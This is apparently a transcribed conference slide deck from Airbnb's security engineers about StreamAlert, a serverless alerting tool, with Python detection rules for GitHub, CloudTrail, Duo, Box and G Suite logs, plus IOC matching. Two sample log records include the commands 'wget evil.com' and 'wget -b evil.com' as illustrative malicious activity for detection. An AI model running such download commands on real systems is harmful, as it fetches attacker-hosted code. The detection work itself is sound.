by Lin Chunyong and Ryan Deivert, Airbnb
AWS Data & Analytics Week is an opportunity to learn about Amazon’s family of managed analytics services. These services provide easy, scalable, reliable, and cost-effective ways to manage your data in the cloud. We explain the fundamentals and take a technical deep dive into the Amazon Redshift data warehouse; data lake services including Amazon EMR, Amazon Athena, and Amazon Redshift Spectrum; log analytics with Amazon Elasticsearch Service; and data preparation and placement services with AWS Glue and Amazon Kinesis. You'll learn how to get started, how to support applications, and how to scale.
2. 1. Who Are We
2. What is StreamAlert
3. Data Normalization
4. Threat Intel
5. StreamAlert Apps
6. The Future
3. Who Are We
CSIRT Engineering
● Ryan Deivert, CSIRT Engineer
● Chunyong Lin, CSIRT Engineer
● Austin Byers, CSIRT Engineer
● Awesome You, CSIRT Engineer
● Jack Naglieri, CSIRT Engineering Manager
4. StreamAlert
Serverless real-time data analysis
streamalert.io
github.com/airbnb/streamalert
[Diagram] Incoming Data: Kinesis, SNS, S3, StreamAlert Apps
[Diagram] Outgoing Alerts: Lambda, Slack, PagerDuty, S3
5. Why StreamAlert?
● Serverless
● Real-time alerting
● Scalable
● Infrastructure as code
● Simple deployment
● Extensive data format support
○ CSV, JSON, key-value, syslog
● Support for different use-cases
○ Security monitoring, compliance, ops
7. Simple Python Rule
from stream_alert.shared.rule import rule

@rule(logs=['ghe:general'],
      outputs=['slack:alerts'])
def github_disable_two_factor_requirement_user(rec):
    """Alert if the two-factor authentication requirement
    was disabled for a user.
    """
    return rec['action'] == 'two_factor_authentication.disabled'
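A rule is an ordinary Python function that takes a parsed record and returns a boolean, so it can be exercised without deploying anything. The sketch below replaces the real `rule` decorator with a hypothetical stand-in that only records metadata (an assumption made so the example runs without StreamAlert installed), and the two sample records are invented for illustration.

```python
# Hypothetical stand-in for stream_alert.shared.rule.rule. It only stores the
# rule's metadata; the real decorator is not reproduced here.
REGISTERED_RULES = {}


def rule(logs=None, outputs=None):
    """Register a rule function together with its log sources and outputs."""
    def decorator(func):
        REGISTERED_RULES[func.__name__] = {
            'func': func,
            'logs': logs or [],
            'outputs': outputs or [],
        }
        return func
    return decorator


@rule(logs=['ghe:general'], outputs=['slack:alerts'])
def github_disable_two_factor_requirement_user(rec):
    """Alert if the two-factor authentication requirement was disabled."""
    return rec['action'] == 'two_factor_authentication.disabled'


# Invented records; only the 'action' field matters to this rule.
suspicious = {'action': 'two_factor_authentication.disabled', 'actor': 'someone'}
benign = {'action': 'repo.create', 'actor': 'someone'}

print(github_disable_two_factor_requirement_user(suspicious))  # True
print(github_disable_two_factor_requirement_user(benign))      # False
```

Because the function has no side effects, the same pattern works in a unit test for any rule in the deck.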
9. More Complex Python Rule
from stream_alert.shared.rule import rule

@rule(logs=['cloudwatch:events'],
      req_subkeys={'detail': ['userIdentity', 'eventType']})
def cloudtrail_root_account_usage(rec):
    """Alert when root AWS credentials are used."""
    return (rec['detail']['userIdentity']['type'] == 'Root'
            and rec['detail']['userIdentity'].get('invokedBy') is None
            and rec['detail']['eventType'] != 'AwsServiceEvent')
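The `req_subkeys` argument suggests that the rule should only run when the nested keys it reads are present. The slides do not show how that check is done, so the following is a minimal sketch of one way it could work; `has_required_subkeys` and `evaluate` are hypothetical helpers, and the sample records are invented.

```python
def has_required_subkeys(rec, req_subkeys):
    """Return True if every listed subkey exists under its parent key."""
    for parent, subkeys in req_subkeys.items():
        nested = rec.get(parent)
        if not isinstance(nested, dict):
            return False
        if any(subkey not in nested for subkey in subkeys):
            return False
    return True


def cloudtrail_root_account_usage(rec):
    """Alert when root AWS credentials are used (logic taken from the slide)."""
    return (rec['detail']['userIdentity']['type'] == 'Root'
            and rec['detail']['userIdentity'].get('invokedBy') is None
            and rec['detail']['eventType'] != 'AwsServiceEvent')


REQ_SUBKEYS = {'detail': ['userIdentity', 'eventType']}


def evaluate(rec):
    """Run the rule only when the record has the subkeys it depends on."""
    return has_required_subkeys(rec, REQ_SUBKEYS) and cloudtrail_root_account_usage(rec)


# Invented records for illustration.
root_call = {'detail': {'userIdentity': {'type': 'Root'},
                        'eventType': 'AwsApiCall'}}
service_event = {'detail': {'userIdentity': {'type': 'Root',
                                             'invokedBy': 'ec2.amazonaws.com'},
                            'eventType': 'AwsServiceEvent'}}
incomplete = {'detail': {'eventType': 'AwsApiCall'}}

print(evaluate(root_call))      # True
print(evaluate(service_event))  # False
print(evaluate(incomplete))     # False, and no KeyError is raised
```

Checking the subkeys first keeps the rule body free of defensive lookups for fields the rule cannot work without.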
10. AWS Services for Incoming Data
● CloudWatch Logs & Events Rules
● S3 Buckets & Event Notifications
● Kinesis Streams and Firehose
● Simple Notification Service
11. AWS Services for Rule Processing
● Lambda
● DynamoDB
● Systems Manager Parameter Store
12. AWS Services for Output
● S3 Bucket
● Athena
● Simple Queue Service
● Lambda Function
13. Real-Time Data Analysis
[Architecture diagram]
● Sources: Laptops, Workstations, Servers; SaaS Applications; APIs; Other
● Incoming Data: Kinesis, SNS, S3, StreamAlert Apps
● Processing: Classify, Normalize, Enrich, and Process Rules; Alert Dispatching; Alert Merging
● Data Enrichment and Rule State: IOCs, Rule Metadata
● Outgoing Alerts: Lambda, Slack, PagerDuty, S3
● Historical Search: Kinesis Firehose, S3, S3 Events, Partitioning, Athena
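The flow in this diagram (classify a record, run the matching rules, dispatch alerts to outputs) can be sketched in a few lines. This is a toy model under stated assumptions, not StreamAlert's implementation: the `example:login` schema, the rule, the exact-key-match classification, and the `senders` mapping are all hypothetical, and normalization, enrichment, and alert merging are left out.

```python
# Hypothetical schema: a log type is recognized by the exact set of keys it has.
SCHEMAS = {
    'example:login': {'user', 'source_ip', 'success'},
}


def classify(rec):
    """Return the log type whose schema keys match the record, else None."""
    for log_type, keys in SCHEMAS.items():
        if set(rec) == keys:
            return log_type
    return None


def failed_login(rec):
    """Hypothetical rule: alert on any failed login."""
    return not rec['success']


# Rules grouped by log type, each paired with the outputs it alerts to.
RULES = {'example:login': [(failed_login, ['slack:alerts'])]}


def process_records(records):
    """Classify each record and collect an alert for every rule that fires."""
    alerts = []
    for rec in records:
        log_type = classify(rec)
        for rule_func, outputs in RULES.get(log_type, []):
            if rule_func(rec):
                alerts.append({'rule_name': rule_func.__name__,
                               'log_type': log_type,
                               'outputs': outputs,
                               'record': rec})
    return alerts


def dispatch(alerts, senders):
    """Send each alert to every output it names; return the number sent."""
    sent = 0
    for alert in alerts:
        for output in alert['outputs']:
            senders[output](alert)
            sent += 1
    return sent


slack_messages = []  # stands in for a real Slack integration
records = [
    {'user': 'alice', 'source_ip': '10.0.0.1', 'success': True},
    {'user': 'bob', 'source_ip': '10.0.0.2', 'success': False},
    {'unexpected': 'shape'},  # unclassified, so no rules run
]
alerts = process_records(records)
sent_count = dispatch(alerts, {'slack:alerts': slack_messages.append})
print(len(alerts), sent_count)  # 1 1
```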
14. Alert Searching via Athena
15. The Problem
Log 1 from log_source_1:
{
  "server": "cylin_server",
  "command_line": "wget evil.com",
  "computer_name": "cylin_mbp",
  "md5": "ABCDEF123456",
  "remote_ip": "1.2.3.4"
}
Log 2 from log_source_2:
{
  "destinationAddress": "1.2.3.4",
  "hostIdentifier": "cylin_mbp",
  "cmdline": "wget -b evil.com",
  "pid": "1234"
}
16. Log 1 from log_source_1:
{
  "server": "cylin_server",
  "command_line": "wget evil.com",
  "computer_name": "cylin_mbp",
  "md5": "ABCDEF123456",
  "remote_ip": "1.2.3.4"
}
from stream_alert.shared.rule import rule

BAD_IP = '1.2.3.4'

@rule(logs=['log_source_1'])
def bad_ip_address_log_source_1(rec):
    """Alert on records from log_source_1 that contain the bad IP address."""
    return rec['remote_ip'] == BAD_IP

Log 2 from log_source_2:
{
  "destinationAddress": "1.2.3.4",
  "hostIdentifier": "cylin_mbp",
  "cmdline": "wget -b evil.com",
  "pid": "1234"
}
from stream_alert.shared.rule import rule

BAD_IP = '1.2.3.4'

@rule(logs=['log_source_2'])
def bad_ip_address_log_source_2(rec):
    """Alert on records from log_source_2 that contain the bad IP address."""
    return rec['destinationAddress'] == BAD_IP
18. Example Rule, Normalization
from stream_alert.shared.rule import rule
from helpers.base import fetch_values_by_datatype

BAD_IP = '1.2.3.4'

@rule(datatypes=['ipAddress'])
def bad_ip_address(rec):
    """Alert on the record from bad ip address."""
    ip_addresses = fetch_values_by_datatype(rec, 'ipAddress')
    return BAD_IP in ip_addresses
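To make the idea behind the normalized rule concrete, here is a minimal sketch of how a lookup by datatype could work. It is not the real `fetch_values_by_datatype` from `helpers.base`: the function name `fetch_values_by_datatype_sketch`, the `NORMALIZED_TYPES` mapping, and the choice to inspect only top-level keys are all assumptions made for illustration.

```python
# Hypothetical mapping from a normalized datatype to the field names that
# different log sources use for it.
NORMALIZED_TYPES = {
    'ipAddress': {'remote_ip', 'destinationAddress'},
    'command': {'command_line', 'cmdline'},
    'hostName': {'computer_name', 'hostIdentifier', 'server'},
}


def fetch_values_by_datatype_sketch(rec, datatype):
    """Return the values of all top-level fields mapped to the given datatype."""
    keys = NORMALIZED_TYPES.get(datatype, set())
    return [value for key, value in rec.items() if key in keys]


BAD_IP = '1.2.3.4'


def bad_ip_address(rec):
    """One rule covers every log source that carries an IP address."""
    return BAD_IP in fetch_values_by_datatype_sketch(rec, 'ipAddress')


log_1 = {'server': 'cylin_server', 'command_line': 'wget evil.com',
         'computer_name': 'cylin_mbp', 'md5': 'ABCDEF123456',
         'remote_ip': '1.2.3.4'}
log_2 = {'destinationAddress': '1.2.3.4', 'hostIdentifier': 'cylin_mbp',
         'cmdline': 'wget -b evil.com', 'pid': '1234'}

print(bad_ip_address(log_1))  # True
print(bad_ip_address(log_2))  # True
```

The point of the design is that adding a new log source means extending the mapping, not writing another copy of the rule.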
19. Potential Considerations
● Too many bad IP addresses
● Lambda memory limitation
● How to update with new IOCs
● How to resolve false positives
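One way to approach the first two considerations is to keep the indicator list out of the function's memory and query an external store only for the values seen in the current batch. The slides do not describe the actual mechanism, so this is a sketch under that assumption: `InMemoryIOCStore` is a hypothetical stand-in for such a store, and `chunk_size` is an arbitrary batching parameter.

```python
class InMemoryIOCStore:
    """Hypothetical stand-in for an external key-value store of indicators."""

    def __init__(self, iocs):
        self._iocs = dict(iocs)
        self.calls = 0  # counts batch requests, to show the effect of chunking

    def batch_get(self, keys):
        """Return {key: ioc_type} for the keys that are known indicators."""
        self.calls += 1
        return {key: self._iocs[key] for key in keys if key in self._iocs}


def chunked(items, size):
    """Yield consecutive slices of items with at most size elements each."""
    for start in range(0, len(items), size):
        yield items[start:start + size]


def lookup_iocs(values, store, chunk_size=100):
    """Look up only the distinct values from this batch, a chunk at a time."""
    unique_values = sorted(set(values))
    matches = {}
    for chunk in chunked(unique_values, chunk_size):
        matches.update(store.batch_get(chunk))
    return matches


store = InMemoryIOCStore({'1.2.3.4': 'ip', 'evil.com': 'domain'})
found = lookup_iocs(['1.2.3.4', '8.8.8.8', '1.2.3.4'], store, chunk_size=2)
print(found)        # {'1.2.3.4': 'ip'}
print(store.calls)  # 1
```

Memory use then depends on the size of the incoming batch rather than on the size of the indicator list, and new indicators can be added to the store without redeploying rules.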
20. Classify & Normalize IOCs
● File hashes
● Domains
● IP addresses
21. Example Rule, Threat Intelligence
from stream_alert.shared.rule import rule, disable
from stream_alert.rule_processor.threat_intel import StreamThreatIntel

@rule(datatypes=['ipAddress'])
def threat_intel_ioc_match_ip_address(rec):
    """Alert on the record from bad ip address."""
    if (StreamThreatIntel.IOC_KEY in rec
            and rec[StreamThreatIntel.IOC_KEY].get('ip')):
        return True
    return False
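The rule above only checks whether an enrichment step has already attached matched indicators to the record. A minimal sketch of such a step follows; the value of `IOC_KEY`, the `KNOWN_IOCS` table, the `IP_FIELDS` tuple, and the shape of the attached data are assumptions for illustration and are not taken from `StreamThreatIntel`.

```python
IOC_KEY = 'streamalert:ioc'  # assumed key name, for illustration only

# Hypothetical indicator table and the fields treated as IP addresses.
KNOWN_IOCS = {'1.2.3.4': 'ip', 'evil.com': 'domain'}
IP_FIELDS = ('remote_ip', 'destinationAddress')


def enrich_with_iocs(rec):
    """Return a copy of rec with matched indicators grouped by type under IOC_KEY."""
    enriched = dict(rec)
    matches = {}
    for field in IP_FIELDS:
        value = rec.get(field)
        if KNOWN_IOCS.get(value) == 'ip':
            matches.setdefault('ip', []).append(value)
    if matches:
        enriched[IOC_KEY] = matches
    return enriched


def threat_intel_ioc_match_ip_address(rec):
    """Alert when enrichment attached at least one matching IP indicator."""
    return bool(rec.get(IOC_KEY, {}).get('ip'))


bad = enrich_with_iocs({'destinationAddress': '1.2.3.4', 'pid': '1234'})
good = enrich_with_iocs({'destinationAddress': '8.8.8.8', 'pid': '1234'})

print(bad[IOC_KEY])                             # {'ip': ['1.2.3.4']}
print(threat_intel_ioc_match_ip_address(bad))   # True
print(threat_intel_ioc_match_ip_address(good))  # False
```

Separating enrichment from the rule keeps the rule itself independent of where the indicators are stored.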
22. StreamAlert Apps
[Diagram] Components: CloudWatch Scheduled Event, App Lambda, SSM Parameter Store, StreamAlert Rule Processor, More SaaS applications
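A plausible reading of this diagram is that a scheduled event invokes an app function, which polls a SaaS API, keeps a checkpoint between runs, and forwards new logs for rule processing. The slides do not spell this out, so the sketch below is an assumption throughout: `InMemoryParameterStore` stands in for a parameter store, `fetch_logs_since` stands in for a SaaS API call, and the parameter name is invented.

```python
class InMemoryParameterStore:
    """Hypothetical stand-in for a parameter store holding app state."""

    def __init__(self):
        self._params = {}

    def get(self, name, default=None):
        return self._params.get(name, default)

    def put(self, name, value):
        self._params[name] = value


# Invented SaaS audit logs, each with a numeric timestamp.
FAKE_SAAS_LOGS = [
    {'timestamp': 100, 'event': 'login'},
    {'timestamp': 200, 'event': 'logout'},
]


def fetch_logs_since(timestamp):
    """Hypothetical SaaS API call: return logs newer than the checkpoint."""
    return [log for log in FAKE_SAAS_LOGS if log['timestamp'] > timestamp]


def run_app(state, forward, param_name='example_app_last_timestamp'):
    """One scheduled run: poll, forward new logs, then advance the checkpoint."""
    last_timestamp = state.get(param_name, 0)
    logs = fetch_logs_since(last_timestamp)
    if logs:
        forward(logs)
        state.put(param_name, max(log['timestamp'] for log in logs))
    return len(logs)


state = InMemoryParameterStore()
forwarded = []  # stands in for sending logs on to rule processing

first_run = run_app(state, forwarded.extend)
second_run = run_app(state, forwarded.extend)
print(first_run, second_run)  # 2 0
```

Advancing the checkpoint only after forwarding means a failed run is retried from the same position on the next schedule.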
23. Apps in Action
24. Duo
Push notification marked as fraudulent by the end user
from stream_alert.shared.rule import rule

@rule(logs=['duo:authentication'])
def duo_fraud(rec):
    """Alert on any Duo authentication marked as fraud."""
    return rec['result'] == 'FRAUD'
25. Box
Box login with email outside of the trusted domain
from helpers.base import ends_with_any
from stream_alert.shared.rule import rule

_VALID_EMAIL_SUFFIXES = {'@example.com', '@corp.example.com'}

@rule(logs=['box:admin_events'])
def box_events_non_domain_email(rec):
    """Alert on box logins with untrusted email addresses"""
    if rec['event_type'] != 'LOGIN':
        return False
    email = rec['created_by'].get('login')
    return not ends_with_any(email, _VALID_EMAIL_SUFFIXES)
26. G Suite
G Suite user failed challenge during login
from stream_alert.shared.rule import rule

@rule(logs=['gsuite:reports'])
def gsuite_suspicious_logons(rec):
    """Alert on suspicious G Suite logins"""
    if rec['id']['applicationName'] != 'login':
        return False
    for event in rec['events']:
        if event.get('name') == 'login_challenge':
            for param in event.get('parameters', []):
                if (param.get('name') == 'login_challenge_status'
                        and param.get('value') == 'Challenge Failed.'):
                    return True
    return False
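The nested structure this rule walks is easier to follow with a concrete record. The sketch below reproduces the rule's logic without the decorator, with the parameter lookup written as `param.get('value')`, and runs it against records built by `make_record`, a hypothetical helper. The record shape is inferred from the fields the rule reads, and the `'Challenge Passed.'` status string is an assumed example of a non-failing value.

```python
def gsuite_suspicious_logons(rec):
    """Alert when a login challenge in a G Suite login report failed."""
    if rec['id']['applicationName'] != 'login':
        return False
    for event in rec['events']:
        if event.get('name') == 'login_challenge':
            for param in event.get('parameters', []):
                if (param.get('name') == 'login_challenge_status'
                        and param.get('value') == 'Challenge Failed.'):
                    return True
    return False


def make_record(status, application='login'):
    """Build an invented report record with one login_challenge event."""
    return {
        'id': {'applicationName': application},
        'events': [{
            'name': 'login_challenge',
            'parameters': [
                {'name': 'login_challenge_method', 'value': 'password'},
                {'name': 'login_challenge_status', 'value': status},
            ],
        }],
    }


failed = make_record('Challenge Failed.')
passed = make_record('Challenge Passed.')
other_app = make_record('Challenge Failed.', application='drive')

print(gsuite_suspicious_logons(failed))     # True
print(gsuite_suspicious_logons(passed))     # False
print(gsuite_suspicious_logons(other_app))  # False
```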
27. Alert in PagerDuty
28. The Future
In Progress
● Alert merging
● Rule “baking”